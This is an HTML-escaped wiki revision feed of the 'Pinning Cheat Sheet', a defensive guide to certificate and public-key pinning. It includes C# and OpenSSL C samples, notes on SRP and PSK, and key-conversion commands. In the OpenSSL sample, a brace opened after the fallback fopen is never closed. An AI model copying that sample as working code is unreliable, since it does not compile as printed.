    &amp;quot;9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE&amp;quot; +&lt;br /&gt;
    &amp;quot;2C3F4CBED9460129C72B0203010001&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
public static void Main(string[] args)&lt;br /&gt;
{&lt;br /&gt;
  ServicePointManager.ServerCertificateValidationCallback = PinPublicKey;&lt;br /&gt;
  WebRequest wr = WebRequest.Create(&amp;quot;https://encrypted.google.com/&amp;quot;);&lt;br /&gt;
  wr.GetResponse();&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
public static bool PinPublicKey(object sender, X509Certificate certificate, X509Chain chain,&lt;br /&gt;
                                SslPolicyErrors sslPolicyErrors)&lt;br /&gt;
{&lt;br /&gt;
  if (null == certificate)&lt;br /&gt;
    return false;&lt;br /&gt;
&lt;br /&gt;
  String pk = certificate.GetPublicKeyString();&lt;br /&gt;
  if (pk.Equals(PUB_KEY))&lt;br /&gt;
    return true;&lt;br /&gt;
&lt;br /&gt;
  // Bad dog&lt;br /&gt;
  return false;&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== OpenSSL ===&lt;br /&gt;
&lt;br /&gt;
Pinning can occur at one of two places with OpenSSL. First is the user supplied &amp;lt;tt&amp;gt;verify_callback&amp;lt;/tt&amp;gt;. Second is after the connection is established via &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt;. Either method will allow you to access the peer's certificate.&lt;br /&gt;
&lt;br /&gt;
Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt; with a '''NULL''' certificate. To check the result of the customary verification: (1) you must call &amp;lt;tt&amp;gt;SSL_get_verify_result&amp;lt;/tt&amp;gt; and verify the return code is &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt;; and (2) you must call &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt; and verify the certificate is '''non-NULL'''.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-openssl.zip|OpenSSL sample program]].&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;int pkp_pin_peer_pubkey(SSL* ssl)&lt;br /&gt;
{&lt;br /&gt;
    if(NULL == ssl) return FALSE;&lt;br /&gt;
    &lt;br /&gt;
    X509* cert = NULL;&lt;br /&gt;
    FILE* fp = NULL;&lt;br /&gt;
    &lt;br /&gt;
    /* Scratch */&lt;br /&gt;
    int len1 = 0, len2 = 0;&lt;br /&gt;
    unsigned char *buff1 = NULL, *buff2 = NULL;&lt;br /&gt;
    &lt;br /&gt;
    /* Result is returned to caller */&lt;br /&gt;
    int ret = 0, result = FALSE;&lt;br /&gt;
    &lt;br /&gt;
    do&lt;br /&gt;
    {&lt;br /&gt;
        /* http://www.openssl.org/docs/ssl/SSL_get_peer_certificate.html */&lt;br /&gt;
        cert = SSL_get_peer_certificate(ssl);&lt;br /&gt;
        if(!(cert != NULL))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Begin Gyrations to get the subjectPublicKeyInfo       */&lt;br /&gt;
        /* Thanks to Viktor Dukhovni on the OpenSSL mailing list */&lt;br /&gt;
        &lt;br /&gt;
        /* http://groups.google.com/group/mailing.openssl.users/browse_thread/thread/d61858dae102c6c7 */&lt;br /&gt;
        len1 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), NULL);&lt;br /&gt;
        if(!(len1 &amp;gt; 0))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* scratch */&lt;br /&gt;
        unsigned char* temp = NULL;&lt;br /&gt;
        &lt;br /&gt;
        /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
        buff1 = temp = OPENSSL_malloc(len1);&lt;br /&gt;
        if(!(buff1 != NULL))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* http://www.openssl.org/docs/crypto/d2i_X509.html */&lt;br /&gt;
        len2 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), &amp;amp;temp);&lt;br /&gt;
&lt;br /&gt;
        /* These checks are verifying we got back the same values as when we sized the buffer.      */&lt;br /&gt;
        /* Its pretty weak since they should always be the same. But it gives us something to test. */&lt;br /&gt;
        if(!((len1 == len2) &amp;amp;&amp;amp; (temp != NULL) &amp;amp;&amp;amp; ((temp - buff1) == len1)))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* End Gyrations */&lt;br /&gt;
        &lt;br /&gt;
        /* See the warning above!!!                                            */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fopen.html */&lt;br /&gt;
        fp = fopen(&amp;quot;random-org.der&amp;quot;, &amp;quot;rx&amp;quot;);&lt;br /&gt;
        if(NULL ==fp) {&lt;br /&gt;
            fp = fopen(&amp;quot;random-org.der&amp;quot;, &amp;quot;r&amp;quot;);&lt;br /&gt;
        &lt;br /&gt;
        if(!(NULL != fp))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Seek to eof to determine the file's size                            */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */&lt;br /&gt;
        ret = fseek(fp, 0, SEEK_END);&lt;br /&gt;
        if(!(0 == ret))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Fetch the file's size                                               */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/ftell.html */&lt;br /&gt;
        long size = ftell(fp);&lt;br /&gt;
&lt;br /&gt;
        /* Arbitrary size, but should be relatively small (less than 1K or 2K) */&lt;br /&gt;
        if(!(size != -1 &amp;amp;&amp;amp; size &amp;gt; 0 &amp;amp;&amp;amp; size &amp;lt; 2048))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Rewind to beginning to perform the read                             */&lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */&lt;br /&gt;
        ret = fseek(fp, 0, SEEK_SET);&lt;br /&gt;
        if(!(0 == ret))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Re-use buff2 and len2 */&lt;br /&gt;
        buff2 = NULL; len2 = (int)size;&lt;br /&gt;
        &lt;br /&gt;
        /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
        buff2 = OPENSSL_malloc(len2);&lt;br /&gt;
        if(!(buff2 != NULL))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fread.html */&lt;br /&gt;
        /* Returns number of elements read, which should be 1 */&lt;br /&gt;
        ret = (int)fread(buff2, (size_t)len2, 1, fp);&lt;br /&gt;
        if(!(ret == 1))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* Re-use size. MIN and MAX macro below... */&lt;br /&gt;
        size = len1 &amp;lt; len2 ? len1 : len2;&lt;br /&gt;
        &lt;br /&gt;
        /*************************/&lt;br /&gt;
        /*****    PAYDIRT    *****/&lt;br /&gt;
        /*************************/&lt;br /&gt;
        if(len1 != (int)size || len2 != (int)size || 0 != memcmp(buff1, buff2, (size_t)size))&lt;br /&gt;
            break; /* failed */&lt;br /&gt;
        &lt;br /&gt;
        /* The one good exit point */&lt;br /&gt;
        result = TRUE;&lt;br /&gt;
        &lt;br /&gt;
    } while(0);&lt;br /&gt;
    &lt;br /&gt;
    if(fp != NULL)&lt;br /&gt;
        fclose(fp);&lt;br /&gt;
    &lt;br /&gt;
    /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
    if(NULL != buff2)&lt;br /&gt;
        OPENSSL_free(buff2);&lt;br /&gt;
    &lt;br /&gt;
    /* http://www.openssl.org/docs/crypto/buffer.html */&lt;br /&gt;
    if(NULL != buff1)&lt;br /&gt;
        OPENSSL_free(buff1);&lt;br /&gt;
    &lt;br /&gt;
    /* http://www.openssl.org/docs/crypto/X509_new.html */&lt;br /&gt;
    if(NULL != cert)&lt;br /&gt;
        X509_free(cert);&lt;br /&gt;
    &lt;br /&gt;
    return result;&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Pinning Alternatives ==&lt;br /&gt;
&lt;br /&gt;
Not all applications use split key cryptography. Fortunately, there are protocols which allow you to set up a secure channel based on knowledge of passwords and pre-shared secrets (rather than putting the secret on the wire in a basic authentication scheme). Two are listed below - SRP and PSK. SRP and PSK have [http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-3 88 cipher suites assigned to them by IANA for TLS], so there's no shortage of choices.&lt;br /&gt;
&lt;br /&gt;
{| align=&amp;quot;center&amp;quot;&lt;br /&gt;
| [[File:pin-iana-assigned.png|thumb|450px|Figure 3: IANA reserved cipher suites for SRP and PSK]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== SRP ===&lt;br /&gt;
&lt;br /&gt;
Secure Remote Password (SRP) is a Password Authenticated Key Exchange (PAKE) by Thomas Wu based upon Diffie-Hellman. The protocol is standardized in [https://tools.ietf.org/rfc/rfc5054.txt RFC 5054] and available in the OpenSSL library (among others). In the SRP scheme, the server uses a verifier which consists of a &amp;lt;tt&amp;gt;{salt, hash(password)}&amp;lt;/tt&amp;gt; pair. The user has the password and receives the salt from the server. With lots of hand waving, both parties select per-instance random values (nonces) and execute the protocol using ''g&amp;lt;sup&amp;gt;{(salt + password)|verifier} + nonces&amp;lt;/sup&amp;gt;'' rather than traditional Diffie-Hellman using ''g&amp;lt;sup&amp;gt;ab&amp;lt;/sup&amp;gt;''.&lt;br /&gt;
&lt;br /&gt;
[[File:homer-p-np.jpg|thumb|right|150px|P=NP!!!]]Diffie-Hellman based schemes are part of a family of problems based on Discrete Logs (DL), which are logarithms over a finite field. DL schemes are appealing because they are known to be hard (unless ''P=NP'', which would cause computational number theorists to have a cow).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== PSK ===&lt;br /&gt;
&lt;br /&gt;
PSK is Pre-Shared Key and specified in [https://tools.ietf.org/rfc/rfc4279.txt RFC 4279] and [https://tools.ietf.org/rfc/rfc4764.txt RFC 4764]. The shared secret is used as a pre-master secret in TLS-PSK for SSL/TLS; or used to key a block cipher in EAP-PSK. EAP-PSK is designed for authentication over insecure networks such as IEEE 802.11.&lt;br /&gt;
&lt;br /&gt;
== Miscellaneous ==&lt;br /&gt;
&lt;br /&gt;
This sections covers administrivia and miscellaneous items related to pinning.&lt;br /&gt;
&lt;br /&gt;
=== Ephemeral Keys ===&lt;br /&gt;
&lt;br /&gt;
Ephemeral keys are temporary keys used for one instance of a protocol execution and then thrown away. An ephemeral key has the benefit of providing forward secrecy, meaning a compromise of the site or service's long term (static) signing key does not facilitate decrypting past messages because the key was temporary and discarded (once the session terminated).&lt;br /&gt;
&lt;br /&gt;
Ephemeral keys do not affect pinning because the Ephemeral key is delivered in a separate &amp;lt;tt&amp;gt;ServerKeyExchange&amp;lt;/tt&amp;gt; message. In addition, the ephemeral key is a key and not a certificate, so it does not change the construction of the certificate chain. That is, the certificate of interest will still be located at &amp;lt;tt&amp;gt;certificates[0]&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Pinning Gaps ===&lt;br /&gt;
&lt;br /&gt;
There are two gaps when pinning due to reuse of the existing infrastructure and protocols. First, an explicit challenge is '''not''' sent by the program to the peer server based on the server's public information. So the program never knows if the peer can actually decrypt messages. However, the shortcoming is usually academic in practice since an adversary will receive messages it can't decrypt.&lt;br /&gt;
&lt;br /&gt;
Second is revocation. Clients don't usually engage in revocation checking, so it could be possible to use a known bad certificate or key in a pinset. Even if revocation is active, Certificate Revocation Lists (CRLs) and Online Certificate Status Protocol (OCSP) can be defeated in a hostile environment. An application can take steps to remediate, with the primary means being freshness. That is, an application should be updated and distributed immediately when a critical security parameter changes.&lt;br /&gt;
&lt;br /&gt;
=== No Relationship ^@$! ===&lt;br /&gt;
&lt;br /&gt;
If you don't have a pre-existing relationship, all is not lost. First, you can pin a host or server's certificate or public key the first time you encounter it. If the bad guy was not active when you encountered the certificate or public key, he or she will not be successful with future funny business.&lt;br /&gt;
&lt;br /&gt;
Second, bad certificates are being spotted quicker in the field due to projects like [http://www.chromium.org Chromium] and [https://addons.mozilla.org/en-us/firefox/addon/certificate-patrol/ Certificate Patrol], and initiatives like the EFF's [https://www.eff.org/observatory SSL Observatory].&lt;br /&gt;
&lt;br /&gt;
Third, help is on its way, and there are a number of futures that will assist with the endeavors:&lt;br /&gt;
&lt;br /&gt;
* Public Key Pinning (http://www.ietf.org/id/draft-ietf-websec-key-pinning-09.txt) – an extension to the HTTP protocol allowing web host operators to instruct user agents (UAs) to remember (&amp;quot;pin&amp;quot;) the hosts' cryptographic identities for a given period of time.&lt;br /&gt;
* DNS-based Authentication of Named Entities (DANE) (https://datatracker.ietf.org/doc/rfc6698/) - uses Secure DNS to associate Certificates with Domain Names For S/MIME, SMTP with TLS, DNSSEC and TLSA records.&lt;br /&gt;
* Sovereign Keys (http://www.eff.org/sovereign-keys) - operates by providing an optional and secure way of associating domain names with public keys via DNSSEC. PKI (hierarchical) is still used. Semi-centralized with append only logging.&lt;br /&gt;
* Convergence (http://convergence.io) – different [geographical] views of a site and its associated data (certificates and public keys). Web of Trust is used. Semi-centralized.&lt;br /&gt;
&lt;br /&gt;
While Sovereign Keys and Convergence still require us to confer trust to outside parties, the parties involved do not serve share holders or covet revenue streams. Their interests are industry transparency and user security.&lt;br /&gt;
&lt;br /&gt;
=== More Information? ===&lt;br /&gt;
&lt;br /&gt;
Pinning is an ''old new thing'' that has been shaken, stirred, and repackaged. While &amp;quot;pinning&amp;quot; and &amp;quot;pinsets&amp;quot; are relatively new terms for old things, Jon Larimer and Kenny Root spent time on the subject at Google I/O 2012 with their talk ''[https://developers.google.com/events/io/sessions/gooio2012/107/ Security and Privacy in Android Apps]''.&lt;br /&gt;
&lt;br /&gt;
=== Format Conversions ===&lt;br /&gt;
&lt;br /&gt;
As a convenience to readers, the following with convert between PEM and DER format using OpenSSL.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Public key, X509&lt;br /&gt;
$ openssl genrsa -out rsa-openssl.pem 3072&lt;br /&gt;
$ openssl rsa -in rsa-openssl.pem -pubout -outform DER -out rsa-openssl.der&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Private key, PKCS#8&lt;br /&gt;
$ openssl genrsa -out rsa-openssl.pem 3072&lt;br /&gt;
$ openssl pkcs8 -nocrypt -in rsa-openssl.pem -inform PEM -topk8 -outform DER -out rsa-openssl.der&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* OWASP [[Injection_Theory|Injection Theory]]&lt;br /&gt;
* OWASP [[Data_Validation|Data Validation]]&lt;br /&gt;
* OWASP [[Transport_Layer_Protection_Cheat_Sheet|Transport Layer Protection Cheat Sheet]]&lt;br /&gt;
* IETF [http://www.ietf.org/id/draft-ietf-websec-key-pinning-09.txt Public Key Pinning]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5054.txt RFC 5054 (SRP)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4764.txt RFC 4764 (EAP-PSK)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc1421.txt RFC 1421 (PEM Encoding)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5280.txt RFC 5280 (Internet X.509, PKIX)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4648.txt RFC 4648 (Base16, Base32, and Base64 Encodings)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc3279.txt RFC 3279 (PKI, X509 Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4055.txt RFC 4055 (PKI, X509 Additional Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc2246.txt RFC 2246 (TLS 1.0)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4346.txt RFC 4346 (TLS 1.1)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5246.txt RFC 5246 (TLS 1.2)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc6698.txt RFC 6698, Draft (DANE)]&lt;br /&gt;
* EFF [http://www.eff.org/sovereign-keys Sovereign Keys]&lt;br /&gt;
* Thoughtcrime Labs [http://convergence.io/ Convergence]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2125 PKCS#1, RSA Encryption Standard]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2128 PKCS#6, Extended-Certificate Syntax Standard]&lt;br /&gt;
* ITU [http://www.itu.int/rec/T-REC-X.690-200811-I/en Specification of Basic Encoding Rules (BER), Canonical Encoding Rules (CER) and Distinguished Encoding Rules (DER)]&lt;br /&gt;
* TOR Project [https://blog.torproject.org/blog/detecting-certificate-authority-compromises-and-web-browser-collusion Detecting Certificate Authority Compromises and Web Browser Collusion]&lt;br /&gt;
* Code Project [http://www.codeproject.com/Articles/25487/Cryptographic-Interoperability-Keys Cryptographic Interoperability: Keys]&lt;br /&gt;
* Google I/O [https://developers.google.com/events/io/sessions/gooio2012/107/ Security and Privacy in Android Apps]&lt;br /&gt;
* Trevor Perrin [https://crypto.stanford.edu/RealWorldCrypto/slides/perrin.pdf Transparency, Trust Agility, Pinning (Recent Developments in Server Authentication)]&lt;br /&gt;
* Dr. Peter Gutmann's [http://www.cs.auckland.ac.nz/~pgut001/pubs/pkitutorial.pdf PKI is Broken]&lt;br /&gt;
* Dr. Matthew Green's [http://blog.cryptographyengineering.com/2012/02/how-to-fix-internet.html The Internet is Broken]&lt;br /&gt;
* Dr. Matthew Green's [http://blog.cryptographyengineering.com/2012/03/how-do-interception-proxies-fail.html How do Interception Proxies fail?]&lt;br /&gt;
* Presentation: [http://www.slideshare.net/anantshri/ssl-pinning-and-bypasses-android-and-ios SSL Pinning implementation and bypasses for iOS and Android]&lt;br /&gt;
&lt;br /&gt;
= Authors and Primary Editors  =&lt;br /&gt;
&lt;br /&gt;
* Jeffrey Walton - jeffrey, owasp.org&lt;br /&gt;
* JohnSteven - john, owasp.org&lt;br /&gt;
* Jim Manico - jim, owasp.org&lt;br /&gt;
* Kevin Wall - kevin, owasp.org&lt;br /&gt;
* Ricardo Iramar - ricardo.iramar, owasp.org&lt;br /&gt;
&lt;br /&gt;
[[Category:Control]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Pinning_Cheat_Sheet&amp;diff=234785</id>
		<title>Pinning Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Pinning_Cheat_Sheet&amp;diff=234785"/>
				<updated>2017-10-31T15:03:04Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: revert HPKP deprecation message&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
= Introduction  =&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
The [[Pinning Cheat Sheet]] is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter's presentation [[Media:Securing-Wireless-Channels-in-the-Mobile-Space.ppt|Securing Wireless Channels in the Mobile Space]]. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability.&lt;br /&gt;
&lt;br /&gt;
A verbose article is available at [[Certificate_and_Public_Key_Pinning|Certificate and Public Key Pinning]]. The article includes additional topics, such as Alternatives to Pinning, Ephemeral Keys, Pinning Gaps, Revocation, and X509 Validation.&lt;br /&gt;
&lt;br /&gt;
== What's the problem? ==&lt;br /&gt;
&lt;br /&gt;
Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.&lt;br /&gt;
&lt;br /&gt;
== What Is Pinning? ==&lt;br /&gt;
&lt;br /&gt;
Pinning is the process of associating a host with their ''expected'' X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a ''pinset'' (taking from [https://developers.google.com/events/io/sessions/gooio2012/107/ Jon Larimer and Kenny Root Google I/O talk]). In this case, the advertised identity must match one of the elements in the pinset.&lt;br /&gt;
&lt;br /&gt;
A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since ''preloading'' the certificate or public key ''out of band'' usually means the attacker cannot taint the pin.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Whitelist? ===&lt;br /&gt;
&lt;br /&gt;
If you are working for an organization which practices &amp;quot;egress filtering&amp;quot; as part of a Data Loss Prevention (DLP) strategy, you will likely encounter ''Interception Proxies''. I like to refer to these things as '''&amp;quot;good&amp;quot; bad guys''' (as opposed to '''&amp;quot;bad&amp;quot; bad guys''') since both break end-to-end security and we can't tell them apart. In this case, '''do not''' offer to whitelist the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being '''instructed''' to do so by the folks in Risk Acceptance.&lt;br /&gt;
&lt;br /&gt;
=== How Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
The idea is to re-use the exiting protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.&lt;br /&gt;
&lt;br /&gt;
To harden the channel, the program would take advantage of the &amp;lt;tt&amp;gt;OnConnect&amp;lt;/tt&amp;gt; callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key.&lt;br /&gt;
&lt;br /&gt;
== What Should Be Pinned? ==&lt;br /&gt;
&lt;br /&gt;
The first thing to decide is what should be pinned. For this choice, you have two options: you can (1) pin  the certificate; or (2) pin the public key. If you choose public keys, you have two additional choices: (a) pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt;; or (b) pin one of the concrete types such as &amp;lt;tt&amp;gt;RSAPublicKey&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;DSAPublicKey&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
[[File:random-org-der-dump.png|thumb| 100px |subjectPublicKeyInfo]]The three choices are explained below in more detail. I would encourage you to pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt; because it has the public parameters (such as &amp;lt;tt&amp;gt;{e,n}&amp;lt;/tt&amp;gt; for an RSA public key) '''and''' contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and the figure to the right shows the additional information available.&lt;br /&gt;
&lt;br /&gt;
=== Certificate ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-cert.png|thumb|right|100px|Certificate]] The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use &amp;lt;tt&amp;gt;openssl s_client&amp;lt;/tt&amp;gt; to retrieve the certificate etc. At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function. &lt;br /&gt;
&lt;br /&gt;
There is a downside to pinning a certificate. If the site rotates its certificate on a regular basis, then your application would need to be updated regularly. For example, Google rotates its certificates, so you will need to update your application about once a month (if it depended on Google services). Even though Google rotates its certificates, the underlying public keys (within the certificate) remain static.&lt;br /&gt;
&lt;br /&gt;
=== Public Key ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-pubkey.png|thumb|right|100px|Public Key]] Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.&lt;br /&gt;
&lt;br /&gt;
There are two downsides to public key pinning. First, it's harder to work with keys (versus certificates) since you must extract the key from the certificate. Extraction is a minor inconvenience in Java and .Net, buts it's uncomfortable in Cocoa/CocoaTouch and OpenSSL. Second, the key is static and may violate key rotation policies.&lt;br /&gt;
&lt;br /&gt;
=== Hashing ===&lt;br /&gt;
&lt;br /&gt;
While the three choices above used DER encoding, its also acceptable to use a hash of the information. In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like &amp;lt;tt&amp;gt;dumpasn1&amp;lt;/tt&amp;gt; and other ASN.1 decoders.&lt;br /&gt;
&lt;br /&gt;
Hashing also provides three additional benefits. First, hashing allows you to anonymize a certificate or public key. This might be important if you application is concerned about leaking information during decompilation and re-engineering. Second, a digested certificate fingerprint is often available as a native API for many libraries, so its convenient to use.&lt;br /&gt;
&lt;br /&gt;
Finally, an organization might want to supply a reserve (or back-up) identity in case the primary identity is compromised. Hashing ensures your adversaries do not see the reserved certificate or public key in advance of its use. In fact, Google's IETF draft ''websec-key-pinning'' uses the technique.&lt;br /&gt;
&lt;br /&gt;
== Examples of Pinning ==&lt;br /&gt;
&lt;br /&gt;
This section discusses certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. Code has been omitted for brevity, but the key points for the platform are highlighted. All programs attempt to connect to [https://www.random.org random.org] and fetch bytes (Dr. Mads Haahr participates in AOSP's pinning program, so the site should have a static key). The programs enjoy a pre-existing relationship with the site (more correctly, ''a priori'' knowledge), so they include a copy of the site's public key and pin the identity on the key.&lt;br /&gt;
&lt;br /&gt;
=== Android ===&lt;br /&gt;
&lt;br /&gt;
This example is using the concept from [https://developer.android.com/training/articles/security-ssl.html#UnknownCa developer.android.com unknown CA implementation document]. Basically you can teach HttpsURLConnection to trust a specific set of CAs.&lt;br /&gt;
&lt;br /&gt;
Download: [https://github.com/riramar/pubkey-pin-android Android app pubkey-pin-android]&lt;br /&gt;
&lt;br /&gt;
=== iOS ===&lt;br /&gt;
&lt;br /&gt;
An open-source SSL pinning library for iOS and OS X was released at Black Hat 2015, which provides an easy-to-use API for deploying pinning within an App: https://github.com/datatheorem/TrustKit .&lt;br /&gt;
&lt;br /&gt;
Otherwise and when using NSURLConnection, iOS pinning is performed through a &amp;lt;tt&amp;gt;NSURLConnectionDelegate&amp;lt;/tt&amp;gt;. The delegate must implement &amp;lt;tt&amp;gt;connection:canAuthenticateAgainstProtectionSpace:&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;. Within &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;, the delegate must call &amp;lt;tt&amp;gt;SecTrustEvaluate&amp;lt;/tt&amp;gt; to perform customary X509 checks.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-ios.zip|iOS sample program]].&lt;br /&gt;
&lt;br /&gt;
=== .Net ===&lt;br /&gt;
&lt;br /&gt;
.Net pinning can be achieved by using &amp;lt;tt&amp;gt;ServicePointManager&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-dotnet.zip|.Net sample program]].&lt;br /&gt;
&lt;br /&gt;
=== OpenSSL ===&lt;br /&gt;
&lt;br /&gt;
Pinning can occur at one of two places with OpenSSL. First is the user supplied &amp;lt;tt&amp;gt;verify_callback&amp;lt;/tt&amp;gt;. Second is after the connection is established via &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt;. Either method will allow you to access the peer's certificate.&lt;br /&gt;
&lt;br /&gt;
Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt; with a '''NULL''' certificate. To check the result of the customary verification: (1) you must call &amp;lt;tt&amp;gt;SSL_get_verify_result&amp;lt;/tt&amp;gt; and verify the return code is &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt;; and (2) you must call &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt; and verify the certificate is '''non-NULL'''.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-openssl.zip|OpenSSL sample program]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* OWASP [[Injection_Theory|Injection Theory]]&lt;br /&gt;
* OWASP [[Data_Validation|Data Validation]]&lt;br /&gt;
